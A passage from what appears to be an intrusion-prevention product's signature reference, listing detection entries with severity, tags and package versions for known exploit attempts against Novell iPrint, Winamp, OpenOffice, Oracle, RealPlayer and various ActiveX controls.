Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-148-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetDriverFile-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-GetPrinterURLList-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-165-2032
Last changed: sgpkg-ips-625-5211
Vulnerability: Novell-iPrint-Client-ActiveX-Control-GetPrinterURLLList-Buffer-Overflow
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Novell-iPrint-Client-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadPrinterDriver-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-UploadResource-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-189-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-366-4219
Last changed: sgpkg-ips-366-4219
Vulnerability: Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-366-4219
Last changed: sgpkg-ips-366-4219
Vulnerability: Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-359-4219
Last changed: sgpkg-ips-359-4219
Vulnerability: Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-Remote-File-Deletion

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Novell-iPrint-Client-Remote-File-Deletion
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Novell iPrint Client for Windows, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-366-4219
Vulnerability: Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
Description:
Back to top

HTTP_SS-Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
Description:
Back to top

HTTP_SS-Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in NullSoft WinAmp detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-BOF

About this situation: An attempt to exploit a vulnerability in Nullsoft Winamp detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Winamp, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Office-BMP-Integer-Overflow-CVE-2009-2518

About this situation: An OLE file that contains a malicious embedded BMP image targeting CVE-2009-2518 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-259-3038
Last changed: sgpkg-ips-259-3038
Vulnerability: Office-BMP-Integer-Overflow-CVE-2009-2518
Description:
Back to top

HTTP_SS-Oleaut32.dll-Remote-Code-Execution-Vulnerability

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: Oleaut32.dll-Remote-Code-Execution-Vulnerability
Description:
Back to top

HTTP_SS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow

About this situation: Malicious EMF file detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-248-3038
Vulnerability: OpenOffice-EMF-File-EMR_BITBLT-Record-Integer-Overflow
Description:
Back to top

HTTP_SS-OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenOffice.org detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-OpenOffice-TIFF-File-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenOffice detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: OpenOffice-TIFF-File-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Opera-Browser-File-URI-Handling-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Opera browser detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-192-2032
Vulnerability: Opera-Browser-File-URI-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Opera-Suspicious-Preference-Modification

About this situation: Detected an attempt to modify Opera preferences in a suspicious way from a script
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Opera, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Opera-Preferences-Modification
Description:
Back to top

HTTP_SS-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle ORADC ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Oracle 8i, Oracle 9i, Oracle 10g, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
Description:
Back to top

HTTP_SS-Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Document Capture, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-374-4219
Vulnerability: Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Document-Capture-EasyMail-ActiveX-Control

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Document Capture, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Oracle-Document-Capture-EasyMail-ActiveX-Control
Description:
Back to top

HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit

About this situation: An exploit against a buffer overflow vulnerability in Oracle Document Capture integrated with Oracle Imaging and Process Management and Oracle Universal Content Management products detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Document Capture, QuikSoft Corp EasyMail, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-268-3038
Vulnerability: Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Oracle Document Capture integrated with the Oracle Imaging and Process Management and Oracle Universal Content Management products detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Document Capture, QuikSoft Corp EasyMail, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-268-3038
Last changed: sgpkg-ips-268-3038
Vulnerability: Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Imaging and Process Management, Oracle Document Capture, Oracle Universal Content Management, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Oracle Document Capture, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle SDK for Solaris, Oracle Java Development Kit, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle JRE detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Oracle-Java-Runtime-CMM-Readmabcurvedata-Buffer-Overflow
Description:
Back to top

HTTP_SS-Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Outside-In-Coreldraw-File-Parser-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Orbit Downloader detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Orbit Downloader, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ourgame GlobalLink detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Ourgame GlobalLink, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Ourworld GLWorld ActiveX component
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Ourworld GLWorld, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
Description:
Back to top

HTTP_SS-PBot-Malware

About this situation: PBot malware detected
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware, TCP Server Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-367-4219
Vulnerability: PBot-Malware
Description:
Back to top

HTTP_SS-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS

About this situation: Attempt to exploit a buffer overflow vulnerability in the PhotoStockPlus Uploader Tool ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, PhotoStockPlus Uploader Tool, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
Description:
Back to top

HTTP_SS-Php-Probe-Script

About this situation: PHP probe script detected
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-368-4219
Vulnerability: Php-Probe-Script
Description:
Back to top

HTTP_SS-Php-Script-External-Command-Execution-Download

About this situation: An attempt to download a specific PHP script detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-370-4219
Vulnerability: Php-Script-External-Command-Execution
Description:
Back to top

HTTP_SS-Php-Scripting-In-Server-Reply

About this situation: Detected PHP scripting in the server reply
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

HTTP_SS-Pidgin-MSN-MSNP2P-Message-Integer-Overflow

About this situation: Attempt to exploit an integer overflow vulnerability in Pidgin instant messaging client over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Pidgin, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-171-2032
Vulnerability: Pidgin-MSN-MSNP2P-Message-Integer-Overflow
Description:
Back to top

HTTP_SS-PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in PPStream ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, PPStream, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
Description:
Back to top

HTTP_SS-RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution

About this situation: Detected attempt to exploit a vulnerability in RealNetworks RealGames
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, RealNetworks RealGames, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the RealNetworks RealPlayer ActiveX control
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, RealPlayer, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution

About this situation: An attempt to exploit a vulnerability in RealNetworks Realplayer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, RealPlayer SP, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, RealPlayer SP, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in RealNetworks RealPlayer detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, RealPlayer Enterprise, RealOne Player, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-194-2032
Vulnerability: RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow

About this situation: Detected an access to a vulnerable method in RealPlayer ActiveX component detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-Playlist-Handling-Exploit

About this situation: Detected an exploit attempt against RealPlayer ActiveX component
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, RealPlayer, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-151-2032
Vulnerability: RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-RecordClip-Parameter-Injection

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, RealPlayer, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-372-4219
Vulnerability: RealNetworks-RealPlayer-RecordClip-Parameter-Injection
Description:
Back to top

HTTP_SS-RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit memory corruption vulnerability in RealNetworks' RealPlayer detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, RealPlayer, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in RealNetworks RealPlayer detected
Context: HTTP Server Stream
Severity: 7
